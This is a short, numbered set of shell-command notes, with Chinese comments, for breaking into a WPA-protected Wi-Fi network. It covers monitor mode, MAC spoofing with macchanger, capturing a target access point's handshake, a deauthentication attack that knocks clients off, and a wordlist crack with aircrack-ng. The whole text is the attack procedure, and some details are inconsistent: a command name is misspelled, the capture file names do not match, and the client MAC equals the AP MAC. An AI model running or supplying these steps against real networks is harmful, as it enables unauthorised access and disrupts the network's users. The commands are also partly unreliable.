1. airmon-ng #查看 wlan0 2. airmon-ng start wlan0 #启动 or mon0 use 1, but the AP use 6*** airmon0ng start wlan0 6 *** 3. airmon-ng #确认 wlan0 & mon0 4. ifconfig mon0 down 5. macchanger -m 00:11:22:33:44:55 mon0 6. ifconfig mon0 up 7. airodump-ng mon0 # 确定待破解AP MAC & channel. 54 wpa ccmp psx ^c 8. airodump-ng -c 6 -w crackwpa6 --bssid 00:26:B6:C1:CC:F0 mon0 # show WAP Handshake ok!!! 9. 另开 aireplay-ng -0 4/10 -a 00:26:B6:C1:CC:F0(AP's MAC) -c 00:26:B6:C1:CC:F0(Client point's MAC) mon0 ^c 10. ls dir 11. aircrack-ng crackwpa11-01.cap -w wordlist